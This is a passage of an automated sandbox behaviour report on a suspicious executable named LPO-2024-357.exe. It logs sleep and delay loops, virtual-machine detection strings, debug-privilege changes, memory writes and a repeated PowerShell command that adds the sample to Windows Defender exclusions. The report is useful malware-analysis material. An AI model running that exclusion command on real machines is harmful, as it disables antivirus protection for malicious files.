                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97203s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96984s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96766s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96438s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96313s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -96063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -95920s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -95809s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -95701s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -95578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -95466s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -95360s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -95235s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -95110s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -94985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -94860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -94735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -94610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -94485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -94360s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -94235s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -94110s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -93985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -93860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -93735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 240000Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239883Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239781Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239652Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239546Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239437Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239322Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239218Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239109Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238997Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238890Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238781Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238671Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238442Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238219Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238046Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 237850Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 237691Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 237558Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 237452Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 99872Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 99640Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 99531Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 99421Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 99313Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 99188Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 99063Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 98887Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 98780Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 98578Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 98297Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 98187Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 98078Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97969Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97859Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97750Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97641Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97531Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97422Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97312Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97203Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 97094Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96984Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96875Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96766Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96656Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96547Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96438Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96313Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96188Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 96063Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 95920Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 95809Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 95701Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 95578Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 95466Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 95360Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 95235Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 95110Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 94985Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 94860Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 94735Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 94610Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 94485Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 94360Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 94235Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 94110Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 93985Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 93860Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 93735Jump to behavior
                        Source: LPO-2024-357.exe, 00000000.00000002.1684821524.0000000000E19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: LPO-2024-357.exe, 00000004.00000002.2922620777.0000000000C21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                        Source: LPO-2024-357.exe, 00000000.00000002.1690208458.0000000002B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEmu@\dq
                        Source: LPO-2024-357.exe, 00000000.00000002.1694260808.0000000003B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lQEmu
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe"
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory written: C:\Users\user\Desktop\LPO-2024-357.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess created: C:\Users\user\Desktop\LPO-2024-357.exe "C:\Users\user\Desktop\LPO-2024-357.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Users\user\Desktop\LPO-2024-357.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
